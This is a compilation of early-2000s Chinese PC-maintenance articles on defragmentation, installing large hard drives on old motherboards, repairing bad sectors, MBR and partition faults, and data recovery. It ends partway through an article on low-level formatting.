一般情况下，在整理了磁盘碎片后，会发现碎片整理报告中有一项“未经过碎片整理的文件”，那下面常常会列出一长串没有被整理的文件名。这些未被整理的碎片大都是正处于运行状态的系统文件，而操作系统是不允许移动这些文件的。
    如果想更彻底进行磁盘碎片整理，可以把系统启动到“安全模式”状态下整理。因为当系统启动到“安全模式”状态下时，只会加载必需的驱动程序和系统文件，而不会加载其它多余的程序。而且操作系统在“安全模式”下占用的内存空间较少，就会有更多的内存用来碎片整理，提高整理速度。

1.整理期间不要进行数据读写
    进行磁盘碎片整理是个很漫长的工作，不少朋友喜欢在整理的同时听歌、打游戏，这是很危险的，因为磁盘碎片整理时硬盘在高速旋转，这个时候进行数据的读写，很可能导致电脑死机，甚至硬盘损坏。
    2.不宜频繁整理
    磁盘碎片整理不同于别的电脑操作，硬盘会高速连续旋转，如果频繁进行磁盘碎片，可能导致硬盘寿命下降，建议一个月左右整理一次。
    3.做好准备工作。
    在整理磁盘碎片前应该先对驱动器进行“磁盘错误扫描”，这样可以防止系统将某些文件误认作逻辑错误而造成文件丢失。具体操作是（以Windows XP为例）：在“我的电脑”中选择要整理的驱动器，单击鼠标右键，在弹出的菜单中选择“属性”，进入“工具”选项卡，点击“查错”栏中的“开始查错”按钮，然后按提示操作即可。
    4.双系统下不要交叉整理
    很多朋友都安装有Windows 98和Windows XP双操作系统，但是由于系统兼容性等原因，交叉进行磁盘碎片整理可能会造成文件易位、混乱甚至系统崩溃，所以建议朋友们在Windows 98中整理Windows 98分区，在Windows XP中整理Windows XP分区。
为了使系统发挥更好的性能，我们经常需要整理磁盘碎片，但对于大容量的硬盘来说，这一工作通常需要花费很多时间，本文将向您介 绍一些加速整理磁盘碎片的技巧。
    关闭应用程序
    由于某些程序在运行的过程中可能需要反复地读取硬盘中的数据，这会影响碎片整理程序的正常工作，在系统不稳定的情况下甚至还会 导致死机现象的发生。因此，为了加快磁盘碎片的整理速度，最好把各个正在运行的程序关闭掉。
    调整参数或使用专用软件
    如果硬盘的容量或者分区的容量比较小，对其进行碎片整理工作需要的时间不会太长，但对于一些塞满数据的大硬盘和分区来说，则需 要一个漫长的等待过程。所以，我们在整理这些大容量的硬盘或者分区时，可以采取下面2种措施: 首先可以将Windows 9x系统自身附带的整理 程序中的优化参数关闭，这样可以加快碎片整理的速度，但这种方法的效果可能不会很明显。另外一种方法是，使用专用的碎片整理工具来对 硬盘或者分区进行整理，例如笔者目前使用的Vop99软件，其整理磁盘碎片的速度就非常快。如果我们每天都使用Vop99整理磁盘碎片，磁盘将 在几分钟内得到优化，系统能够一直保持最佳状态。笔者建议大家使用Windows的计划任务程序，设定至少每周自动运行一次Vop99。
    修改注册表自动关闭屏幕保护
    在进行磁盘碎片整理工作前，首先要关闭屏幕保护程序，否则磁盘碎片整理程序会反复地启动，但是如果每次都通过人工的方式来关闭 应用程序，可能比较麻烦。在这里笔者告诉大家一个小窍门，即通过修改注册表来实现自动关闭屏幕保护。具体操作步骤如下: 首先，在命令 行中使用regedit命令打开注册表，定位到"HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionApplets"，然后在此路径下寻找是 否有"Defrag"键值，如果没有，就新建一个，系统默认情况下都有此键值。在"Defrag"键值下再新建一个名为"Settings"的主键，然后再在此 新建的主键下建立一个名为"DisableScreenSaver"的主键，最后将它的默认字符串值改为"YES"即可。以后每次运行磁盘碎片整理程序时系统会 自动屏蔽掉屏幕保护，运行完成后自动恢复。
    改变临时文件夹位置 　　在使用IE浏览器上网冲浪时，为了能花很少的钱访问更多的信息，用户常常会采取离线浏览的方法来进行访问。而每次上网后，IE浏览器 将会在C:WindowsTemporary Internet Files目录中留下许多临时文件。如果我们频繁地上网冲浪，IE浏览器可能会在该目录下生成大量临时文 件，同样会对硬盘频繁读写，产生大量碎片，从而影响访问速度。为了避免这一情况，我们同样可以将临时目录指定到其他分区。方法为: 首 先在D盘中建立一个临时文件的存放目录，选择"控制面板"*"Internet选项"，在打开的对话框中单击"设置"按钮，然后单击"移动文件夹"按钮 ，选择D盘中相应目录即可。
    保留一定的磁盘空间
    我们在使用中会发现，如果硬盘的剩余空间太小，运行应用程序的速度将会很慢，磁盘碎片整理也很难进行。所以，对于比较小的磁盘分 区，最好保持15%以上的可用空间; 对于比较大的磁盘分区，最好保持5%以上的可用空间; 对于引导分区，至少要有40MB以上的可用空间。另外 ，在使用电脑的过程中，我们应该及时释放浪费的磁盘空间，例如经常清空回收站、删除上网后的历史记录以及删除临时文件夹和文件等。


老主板“软斗”大硬盘

《一键清理系统垃圾》

老主板“软斗”大硬盘

《中国电脑教育报》tgonline2000

    本人的“爱姬”用的是技嘉440BX主板，最近请回了一块希捷40GB 7200转的“大家伙”。

    早就听说老主板认不了大硬盘，非要刷新BIOS不可，或是用专门的所谓“硬盘驱动”。本人愚见，认为后者更为可取。便事先准备了DiscWizard 2002（专门为希捷硬盘服务的软件），并用它制作了一张名为DiscWizard Starter Edition的启动软盘，可以用来对硬盘分区、格式化并且可以突破老主板无法识别8.4GB以上硬盘的瓶颈。

    当我把大硬盘安装好，并将制作好的DiscWizard Starter Edition软盘插入软驱启动后，出乎意料的麻烦出现了：在刚出现开机的第一幅画面后，电脑像是被定住了似的，没有任何反应了。我心里暗想：不妙！连软盘都不读了，还谈什么分区、格式化呀！擦罢额头冷汗急想对策。于是我硬着头皮按下“Del”键，进入BIOS设置界面，选择第一项STANDARD CMOS SETUP将Primary Master项设置为None ，保存退出。重新启动电脑，问题得到圆满解决，顺利进入DiscWizard Starter Edition的操作界面，再选Utilities项进行“傻瓜”似的选择，便可以将对硬盘的分区、格式化操作一并搞定！最后，重新启动计算机再次进入BIOS设置，将刚才的None改为Auto，保存退出，就算是大功告成啦，不必再冒险升级主板的BIOS了。

    叮当点评：今年第3期A14版《老主板安装希捷大硬盘》也提到使用专用软件分区前，需要先将硬盘设置为NONE，但有部分读者反映此举并不必要。本文便是一个例子，为求稳妥，做好设置可以避免一些弯路。


老主板安装希捷大硬盘

《一键清理系统垃圾》

老主板安装希捷大硬盘

《中国电脑教育报》马吉玮

    以前见到过关于老主板安装大硬盘的文章，但都没仔细读过，总以为那是486级别的老爷机才会出现的问题。买了个希捷的40GB硬盘回家后才发现，自己的Intel 430LX主板不支持33GB以上硬盘！从报上、网上找了一些资料，没有一篇是针对我的希捷硬盘写的。经过几天的摸索，终于成功，现将老主板安装希捷硬盘的方法拿出来与大家共享。

    在安装硬盘前，要下载希捷的专用管理工具DiskManager。希捷的官方网站下载页在http://www.seagate.com/support/disc/drivers/discwizard_16bit_download.html，驱动之家的下载页是http://www.mydrivers.com/cgi-bin/disk/840,1.htm。

    下载后的程序是一个可执行文件，运行后插入空白软盘并一路回车即可得到一张DM启动盘。接下来对新硬盘进行操作。首先，关机断电，取下旧硬盘，将新硬盘跳为主盘换上，开机进入BIOS，将STANARD CMOS SETUP中的Primary Master TYPE设为NONE，保存后插入DM启动盘并重启。用启动盘启动电脑后软件会自动寻找硬盘，如发现希捷硬盘则出现欢迎屏幕，按回车即可进入。

    进入管理界面后选择Advanced options（高级选项）→Maintenance option（维护选项）→Utilites（实用功能），屏幕左边会出现找到的硬盘，右边是硬盘的几个基本数据。在新硬盘上回车，又出现一个菜单，选Set Drive Size（设置硬盘大小），出现蓝色背景提示，回车继续，这时会有一个字符框让你输入想要设置的硬盘大小。注意，此处的改变并不会影响硬盘的真正大小，只不过是用来骗骗主板罢了。已经在输入框内的大小正好是33GB，如果你的主板和我的一样是430LX/EX的，直接回车即可。如果是更老的主板，就再改小点吧，就是改成1MB也不要紧的。在接下来出现的警告屏中按Alt+C完成操作，重启时将BIOS中的Primary Master TYPE/MODE设为AUTO/AUTO，保存并重启后你会发现硬盘被认出来了！

    因为硬盘是以33GB的身份“混”进电脑的，所以硬盘启动时会加载一个叫做ONTRACK的东东，它可以让你完整的使用全部硬盘空间。并不像有的文章所说，有了这个ONTRACK的硬盘就不能拿到别的电脑上使用了。我把装过ONTRACK的硬盘装到能够正确识别大硬盘的电脑上，照样可以使用，数据也丝毫无损。经过一段时间的摸索发现， ONTRACK对硬盘的使用没有什么影响，甚至用FDISK和SYSTEM COMMANDER分区并安装多操作系统，也一点问题都没有。与不安装ONTRACK时的一点区别是只能在出现蓝色提示后才可以用软盘启动并对硬盘进行操作。方便起见，BIOS中的启动顺序只设为C only就行了，惟一的遗憾就是不能用光盘启动了。


利用DM软件使硬盘再生

《一键清理系统垃圾》

利用DM软件使硬盘再生

    一个富士通硬盘，能列出在BIOS中的参数（SIZE=2159、CYLS=523、HEAD=128、LANDZ=4469、SECTORS=63、MODE=LBA），但是利用FDISK无法进行分区，即使是经过低级格式化以后也不能分区。后来应用DM软件进行修复，经过一番折腾以后，硬盘容量虽然达不到原来的数值，但总算可以进行分区，可以进行高级格式化，并安装了Win98操作系统。现在将本人的修复办法介绍于后，供有此类硬盘故障的朋友参考。
    我们知道，DM是一个比较实用的磁盘工具软件，它比FDISK略胜一筹：一是它不但可以对硬盘进行分区，而且在分区时可以避开那些坏磁道，而FDISK对于有坏道的硬盘就显得无能为力了；二是可以对硬盘进行低级格式化和高级格式化；三是能进行校验等管理。DM软件目前有两个版本，DM4.5和DM5.01。无论你选用哪一个版本都可以达到预期的目的。我们在购买硬盘时，电脑商都会随盘赠送一个DM软件，如果你手头没有DM软件，也可以到有关网站上下载，经解压后就可以使用了。
    本人所使用的是在购买Seagate（希捷）硬盘时随盘赠送的DM软件。它提供的低级格式化有三种方式，即格式化一个磁道，格式化一个分区和格式化整个硬盘。它的启动方式也有两种，即自动方式和手动方式。自动方式对于新硬盘来说，就显得比较简单好用，但也要知道硬盘的型号；而对于具有多处坏道的旧硬盘来说，自动方式就不是那么适用了。所以只能选用手动方式启动，以便可随意调整各分区的起止磁道。运用手动方式启动时要输入参数，即DM/M。
    具体的修复方法是：首先准备好一台运行正常的计算机，然后打开上盖，拔下原来的硬盘信号线和电源线，接到有故障的硬盘上，注意把硬盘安放在平整的地方。在A驱中插入一张干净的Win98系统启动盘，打开电源开关。当屏幕上出现开机画面时按下DEL键，进入CMOS设置，也就是将硬盘的参数设置好，并设置让系统从A盘启动。启动成功后，换上DM软件盘，输入“DM/M”，经过一阵读盘后就会出现主界面。按回车键，选“yes”，回车后，会出现两个窗口。右边的是快速参考窗口，左边的是磁盘管理器主菜单（Disk Manager Main Menu）窗口。在磁盘管理器主菜单窗口中选“（E）dit/view Partitions”（编辑/查看分区）一项，然后会出现硬盘型号（本人的硬盘型号为“FUJITSU MPB3021ATU”），选中相应型号的硬盘。这时在右边的窗口列出了硬盘的参数，包括柱面数、磁头数、扇区和硬盘总容量等。如果你的硬盘原来已经进行了分区和格式化，那么就会在左边的两个窗口中显示分区和格式化的情况。如果没有分区，那么左边的两个窗口都是空的。本人的硬盘已经分为两个区，即C区和D区。对于已经分区的硬盘，首先要删除原来的分区，先按DEL键删除C区，然后删除D区。值得注意的是，在删除D区时还会弹出一个红色的窗口，这时按下“Alt＋D”键即可删除。删除原来的分区后，就可以重新建立分区了。
    按Insert键可建立分区，这时又弹出一个选择分区类型窗口，其中包括四个选项：（1）DOS－FAT32、（2）DOS－12/16、（3）EXTENDED、（4）OTHER。你可以根据硬盘容量的大小来决定选项，如果硬盘容量大，则可以选DOS－FAT32一项，如果硬盘容量小，可以选DOS－FAT12/16一项，本人选的是第一项。在弹出的“Select Entry Mode”（选择输入项方式）中，选“（C）ylinders（磁道）”一项。这时在弹出的窗口中显示了硬盘的起止磁道空间，我的硬盘磁道起止为0522。这时要根据实际情况来选定主分区C盘的起止磁道，避开那些坏磁道，具体是哪些磁道坏，就要经过多次操作以后才能确定大概的位置。本人的硬盘是前面和中间部分的磁道损坏（估计是物理损坏），大概是（0，18）和（321，358），根据该硬盘的具体情况，本人选定主分区C盘的起止磁道是（360，522）。输入起止磁道后回车，这时DM软件已经记录下主分区的参数并弹出下一个分区的类型选择窗口，这时只有“EXTENDED”（扩展分区）和“OTHER”（其他分区）两项可供选择。选择“EXTENDED”项，回车后，在弹出的窗口中同样选择“（C）ylinders”，再输入起止磁道（19，320），在弹出的窗口中继续选这个分区的方式，我仍然选第一项DOS－FAT32。接着是选择建立逻辑盘并输入起止磁道及逻辑盘的系统形式，我们可选建立多个逻辑盘。再回车后弹出分区情况表，按ESC键退出到分区类型窗口，将光标移至“Save and continue”，再存盘退出到磁盘管理器主菜单，选择“（F）ormat/check Partitions”将所有分区高级格式化，在回车的过程中，都应选“yes”一项。如果在分区时选择“DOS－FAT32”一项时，这时又会弹出每簇的大小，我选4K（默认值）这一项。接着对C盘进行高级格式化，在格式化过程中，它会提示你在A驱中插入Win98系统盘，然后将系统文件复制到C盘中。C盘格式化完成后，接着格式化D盘。值得一提的是，运用DM软件高级格式化磁盘时比用Format进行格式化快了很多。D盘格式化完成后按ESC退出，再按复位键或“Ctrl＋Alt＋Del”键重新启动机器。
    接下来的事就是安装Win98了，相信不用我说你也知道了吧


令维修人员大跌眼镜的硬盘故障

《一键清理系统垃圾》

令维修人员大跌眼镜的硬盘故障

天天修电脑，却也会被电脑“修”了一回。

    我自己的办公用机，一年多来经常会出现这么一种故障：早晨只要一开机，肯定找不到硬盘。多开几次机就能找着硬盘了。我也一直也没当回事，总觉得是主板问题。麻烦就麻烦一点吧，总比打申请更换新主板的手续简单吧。

    不过，到后来问题越来越严重，竟然正在读写数据时，会突然碰出个蓝屏，提示无法正常读写驱动器X。

    今天，我终于找到了真正的问题所在，竟然是硬盘的的电源插口。四芯D形电源插头内部的金属簧片因为使用时间长的原因，插孔变大，内部氧化，与硬盘的电源接口接触不牢，就造成了硬盘供电不正常，硬盘当然也就不能工作了。

    整个过程是这样的...

    在去年冬天的时候，偶尔一次会开机找不到硬盘。刚开始也没有当回事，反正多开几次就能找到硬盘，时间长了，也就习惯了。不过，当天再冷些时，竟然开机几十次也找不到硬盘。不知产谁出的点子，用电吹风对着机器吹，吹一会儿就能找着硬盘了。机器只要工作起来就没有其他问题。用电吹风吹得时间长了，也就摸着窍门了，只要对着硬盘吹就行，一吹就准能找着硬盘，整个冬天就这么过来了。到天慢慢热得时候，故障也就变得不严重了，不用电吹风，也能正常启动，只是偶尔一次找不到硬盘。

    因为老是这样，为了方便，就干脆把机箱档板拆了，硬盘找不着时，拔插一下硬盘的电源接口就可以了。虽然自己天天修电脑，但对于自己的电脑的这种问题，因为时间长了，也就习惯了，肯定是硬盘的电路板有问题。我也用万用表测试过D形插头的电源电压，每个插头的＋5V，＋12V都完全正常，不是供电不正常的原因。

    本来，天天这样拔插都习惯了。可是有一次让我急了，非找出原因不可。一天早晨，上班后打开电脑，第一次找不到硬盘。我拔插了一遍硬盘电源插头，再启动，就正常了。电脑运行了半个多小时，突然蹦出个蓝屏，提示无法正常读取C盘。再回车就死机了。重启吧。平时重启呢，扫描完硬盘，就可以进入桌面。不过，这次却不一珜了，竟然提示注册表错误，需要使用“SCANREG/RESTORE”命令来进行修复。修电脑就是这样，必须看清楚屏幕上的提示信息，并根据提示执行快多了。但是这次却是一连串的问题，再次重启时，竟然提示找不到“COMMAND.COM”命令解释器文件。问题越来越严重了。再启，还是不行，到最后，竟然什么提示也没有了，自检后就黑屏了。真是破车，连修也不敢修了。

    我真是愁死了，不会是硬盘坏了吧？

    我赶紧找了个启动光盘，从光驱启动后，查看一下C盘，竟然一个文件也没有，是空的。再看D盘，E盘，还好，文件都还在。这是怎么回事？C盘竟然会突然数据全部丢失。幸亏我平时都把自己的文件和数据，电子邮件都存在了D盘，但是系统需要重装了。

    接下来就是忙了两个小时，才把系统和平时需要的软件安装完毕。

    第二天上班后，再开机，仍然找不到硬盘。不过，这次我无意中注意到，找不到硬盘时，没有听到平时非常熟悉的硬盘高速旋转时的“吱吱”声，硬盘竟然什么动静也没有了。

    硬盘没有供电？我拔下硬盘的电源插头和其他所有空闲的D形电源插头，用万用表测试其输出电压，＋5V，＋12V都正常，供电没有问题。再插上去，开机，还是没有声音。这时我试着用手动了一下硬盘的供电插头，突然听到了“吱...“的一声，硬盘找到了。硬盘电源口接触不牢？我很快就把硬盘拆下来，检查硬盘电源接口是不是存在虚焊的问题。仔细看了一遍，并用万用表进行了测量，没有发现问题。再装回机器，还是有时好有时不好。

    说句实在话，这问题太隐蔽了，我真想这么受下去了。

    突然我想起来自己曾经遇到过的一次维修经历，IBM机器的光驱电源插头因为经常拔，＋5V供电给拔断了，但是表面好好的。当是就是找不到光驱，费了好大劲，才查出来是电源插头的原因。这次会不会也是呢？我再次认真的检查了每一个电源插头，也不存在有断线的情况。但是在检查时，我发现因为机器使用时间长了，电源插头内的金属簧片外面没有氧化，但内圈（和硬接口接触的地方）有些轻微的氧化，并且因为经常拔插，中间的孔明显变大。

    会不会就是这点不起眼的地方造成了困扰也我一年来的头疼问题。

    我用小螺丝刀和小镊子把金属簧片除锈，同时把内孔调小，使其与硬盘接口的接触电阻减小。当我再把硬盘接好后，一开机马上就找到了硬盘。

    一直到现在，我的机器再也没有出现过找不到硬盘的毛病。

    就因为自己处理问题不够彻底，竟然被自己的电脑整了一年！还是专家呢？说起来真的让别人笑！


拿什么拯救你？我的硬盘！

《一键清理系统垃圾》

拿什么拯救你？我的硬盘！

    出处：北方网　　责任编辑：ANSON　　2006-08-08 15:56:43

    每个用户的硬盘中都存放着大量的有用数据，而硬盘又是一个易出毛病的部件。除了有效的保存硬盘中的数据，备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者提取其中的有用数据，把损失降到最小程度。

    1、系统不承认硬盘

    此类故障比较常见，即从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE口端口上，硬盘本身的故障率很少，可通过重新插拔硬盘电缆或者改换IDE口及电缆等进行替换试验，可很快发现故障的所在。如果新接上的硬盘不承认，还有一个常见的原因就是硬盘上的主从条线，如果硬盘接在IDE的主盘位置，则硬盘必须跳为主盘状，跳线错误一般无法检测到硬盘。

    2、CMOS引起的故障

    CMOS的正确与否直接影响硬盘的正常使用，这里主要指其中的硬盘类型。好在现在的机器都支持"IDE auto detect"的功能，可自动检测硬盘的类型。当连接新的硬盘或者更换新的硬盘后都要通过此功能重新进行设置类型。当然，现在有的类型的主板可自动识别硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用Normal、LBA、Large等。如果在一般的模式下安装了数据，而又在CMOS中改为其他的模式，则会发生硬盘的读写错误故障，因为其物理地质的映射关系已经改变，将无法读取原来的正确硬盘位置。

    3、主引导程序引起的启动故障

    硬盘的主引导扇区是硬盘中的最为敏感的一个部件，其中的主引导程序是它的一部分，此段程序主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软区或光区之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的fdisk最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，fdisk。exe之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS 3。x到目前有winDOS 95的DOS，所以只要找到一种DOS引导盘启动系统并运行此程序即可修复。另外，像kv300等其他工具软件也具有此功能。

    4、分区表错误引导的启动故障

    分区表错误是硬盘的严重错误，不同错误的程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软区或光区引导系统后可对硬盘读写，可通过fdisk重置活动分区进行修复。如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32mb的基本DOS分区值为06，而扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统，并且不能读写其中的数据。如果把06改为DOS不识别的类型如efh，则DOS认为改分区不是DOS分区，当然无法读写。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复，唯一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据，否则将导致其他的数据永久的丢失。在对主引导扇区进行操作时，可采用nu等工具软件，操作非常的方便，可直接对硬盘主引导扇区进行读写或编辑。当然也可采用debug进行操作，但操作繁琐并且具有一定的风险。

      5、分区有效标志错误引起的硬盘故障

    在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节:55aah，此字为扇区的有效标志。当从硬盘，软盘或光区启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此标志时从硬盘启动将转入rom basic或提示放入软盘。从软盘启动时无法转入硬盘。此处可用于整个硬盘的加密技术。可采用debug方法进行恢复处理。另外，DOS引导扇区仍有这样的标志存在，当DOS引导扇区无引导标志时，系统启动将显示为:"missing operating system"。其修复的方法可采用的主引导扇区修复方法，只是地址不同，更方便的方法是使用下面的DOS系统通用的修复方法。

      6、DOS引导系统引起的启动故障

    DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括iosys、msdos.sys、command.com，其中command.com是DOS的外壳文件，可用其他的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows 95携带的DOS系统中，msdos.sys是一个文本文件，是启动windows必须的文件。但只启动DOS时可不用此文件。但DOS引导出错时，可从软盘或光盘引导系统，之后使用sys c:传送系统即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

    7、fat表引起的读写故障

    fat表纪录着硬盘数据的存储地址，每一个文件都有一组连接的fat链指定其存放的簇地址。fat表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个fat表，如果目前使用的fat表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其fat表的长度及第二个fat表的地址也是不固定的，所以修复时必须正确查找其正确位置，由一些工具软件如nu等本身具有这样的修复功能，使用也非常的方便。采用debug也可实现这种操作，即采用其m命令把第二个fat表移到第一个表处即可。如果第二个fat表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用chkdsk或scandisk命令进行修复，最终得到*。chk文件，这便是丢失fat链的扇区数据。如果是文本文件则可从中提取并可合并完整的文件，如果是二进制的数据文件，则很难恢复出完整的文件。

    8、目录表损坏引起的引导故障

    目录表纪录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号，目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用上面的chkdsk或scandisk程序的方法，从硬盘中搜索出chk文件，由目录表损坏时是首簇号丢失，在fat为损坏的情况下所形成的chk文件一般都比较完整的文件数据，每一个chk文件即是一个完整的文件，把其改为原来的名字可恢复大多数文件。

    9、误删除分区时数据的恢复

    当用fdisk删除了硬盘分区之后，表面现象是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示无效驱动器。如果了解fdisk的工作原理，就会知道，fdisk只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容。具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变，可仿造上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区即数据，但这只限于除分区或重建分区之后。如果已经对分区用format格式化，在先恢复分区后，在按下面的方法恢复分区数据。

    10、误格式化硬盘数据的恢复

    在DOS高版本状态下，格式化操作format在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区，fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行"unformat c:"即可恢复原来的文件分配表及目录表，从而完成硬盘信息的恢复。另外DOS还提供了一个miror命令用于纪录当前的磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。


浅谈IDE硬盘常见故障与维护

《一键清理系统垃圾》

浅谈IDE硬盘常见故障与维护

    一、永久故障
    进入CMOS设置，不能识别硬盘。
    1．嘎嘎响——可能电机坏了或者是整个盘面严重损坏。
    2．静电——质量问题或电源线接反了，把控制芯片等烧毁。
    这种情况，个人无法处理。
    二、盘面故障
    1．零磁道划伤现象：用FDISK无法分区，分区时嘎嘎做响，硬盘灯长亮。
    处理：用老版本的DM分区，因为它带有使硬盘的零磁道上下偏移一道的功能。如果是硬盘的零磁道左右几道都严重划伤，分区表无法建立，我想DM也无能为力了。
    2．其它磁道划伤现象：可以进行分区，低格或高格，以及用SCANDISK、NU等盘面扫描工具会发现很多坏道，处理速度很慢，严重的有时让人无法等待，即使标志了坏道后也会经常出现读写出错的问题。
    处理：建议把硬盘分成若干小区，逐个格式化或者扫描盘面，找到坏区的大致柱面或者扇区位置。为使数据更安全，最好把它单独分成一个区，用快速格式化处理后，不再使用。
    三、软件故障
    类似于逻辑炸弹这样的程序造成的假零磁道损坏，除了用专门解锁的程序处理外，可以低格硬盘前几个磁道或者用DM清零的办法使硬盘重新分区使用，但数据会全部丢失。主引导记录MBR信息被破坏，会造成用MS－DOS3.3以上的MS－DOS的系统重新分区处理的硬盘还是不能启动，处理的办法很简单，执行FDISK/MBR，或者用些类似DM这样的软件重写一遍就行了。
    四、日常维护
    硬盘的工作环境应该远离高磁场，特别是在使用时，严禁震动，不要热插拔，经常读写使用的扇区最好经常改换位置，用除FDISK之外的DM、PQMAGIC、SFDISK等很多软件都可以让一些主分区在磁盘中的任意位置开始，这样可以避免一些软件系统频繁读写同一些扇区。


巧用Ghost擦去硬盘坏扇区

《一键清理系统垃圾》

巧用Ghost擦去硬盘坏扇区

    上月，我例行给小舅子的机子作“身体检查”，发现E区坏扇区共8192字节，马上运行Win98磁盘扫描程序，不能修复，再运行NDD磁盘修复工具，也不行。记得以前曾看过高格硬盘修复逻辑坏道的文章，那就先格式化吧。

    马上进入DOS下高级格式化E区，完成后再进Win98一看，结果令我差点就瘫在椅子上：坏扇区不但没消除，反倒狂增了3M多。这便如何是好？往后几天运行，硬盘既无异常声响，亦无读写错误，坏扇区大小也没变化。

    虽说操作一切正常，但心里总有不甘，难道要使出低格硬盘这最后一招？不行，低格对硬盘有一定的损害，况且几十G的硬盘低格下来要很长时间。看来不到万不得已不走这步。继续翻查资料，发现有介绍norton uitility工具箱中的wipe工具可以在不删除硬盘原有数据的基础上擦除逻辑坏道。

    找的就是它了，又想起ghost也是擦除目标盘上的数据后再覆盖影像文件的，既然都是擦除，那它们会不会有异曲同工之效？反正F区装有ghost,里面有c区的备份。马上在Windows下运行ghost，选择还原至E区。

    不一会儿，提示还原成功，随即扫描E区，结果大喜过望：坏扇区共0字节！太好了！再快速格式化E区，仍报坏扇区为0字节。至此确认E区逻辑坏道已被完全修复，感觉好极了！


如何维修硬盘坏道

《一键清理系统垃圾》

如何维修硬盘坏道

   治疗方法：

1、Scandisk磁盘扫描程序是解决硬盘逻辑坏道最常用的手段，而常见的Format命令不能对任何硬盘坏道起到修补作用。如果硬盘出现了坏道，可在Windows系统环境下，在“我的电脑”中选中要处理的硬盘盘符，选择其“属性”，在出现的“工具”按钮中选择“查错状态”，点击“开始检查”，再在“扫描类型”中选“全面检查”，并将“自动修复错误”打上“勾”，然后“开始”既可，它将对硬盘盘面作完全扫描处理，并且对可能出现的坏簇作自动修正。其次，在Dos状态下，硬盘有坏道，计算机在启动时一般会自动运行Scandisk进行扫描，并将坏簇以黑底红字的“B”（bad）标出。如果系统在启动时不进行磁盘扫描或已不能进入Windows系统，也可用软盘或光盘启动盘启动电脑后，在相应的盘符下运行Scandisk *：（注*为要扫描的硬盘盘符），回车后来对相应需要扫描修复的硬盘分区进行修理。

2、诺顿工具箱中的NDD“磁盘医生”及PCTOOLS等相关工具对硬盘进行扫描也是修复硬盘坏道的最常用的方法。

3、如果硬盘上出现了无法修复的坏簇或物理坏道，大家可用一些磁盘软件将这些坏道单独分为一个区并隐藏起来，这样可令你的硬盘延长很多正常的使用寿命。

4、系统显示“TRACK 0 BAD，DISK UNUSABLE”，意思为“零磁道损坏，硬盘无法使用”或用磁盘扫描程序扫描其它硬盘时其0扇区出现红色“B”。硬盘0扇区损坏，可以合理运用一些磁盘软件，把报废的0扇区屏蔽，而用1扇区取而代之就能起到起死回生的效果，这样的软件如Pctools9.0和NU8等等。以Pctools9.0为例来做说明。用盘启动电脑后，运行Pctools9.0目录下的De.exe文件，接着选主菜单Select中的Drive，进去后在Drive type项选Physical，按空格选定，再按Tall键切换到Drives项，选中hard disk，然后OK回车后回到主菜单，打开Select菜单，这时会出现Partition Table，选中进入后出现硬盘分区表信息。该硬盘有两个分区，找到C区，该分区是从硬盘的0柱面开始的，那么，将1分区的Beginning Cylinder的0改成1就可以了，保存后退出。重新启动电脑后按Del键进入回Coms设置，运行“Ide Auto Detect”，可以看到CYLS由782变成781，保存退出后重新分区格式化该硬盘。

作者：


什么叫低格？怎样执行

《一键清理系统垃圾》

什么叫低格？怎样执行

不同的工具所做的低格对硬盘的作用各不一样。有些人觉得低格可以修复一部分硬盘，有些人则觉得低格十分危险，会严重损害硬盘。认为低格是修复硬盘的一个有效手段。下面总结一些关于低格的看法，与广大网友交流。
大家关心的一个问题：“低格过程到底对硬盘进行了什么操作？”实践表明低格过程有可能进行下列几项工作，不同的硬盘的低格过程相差很大，不同的软件的低格过程也相差很大。
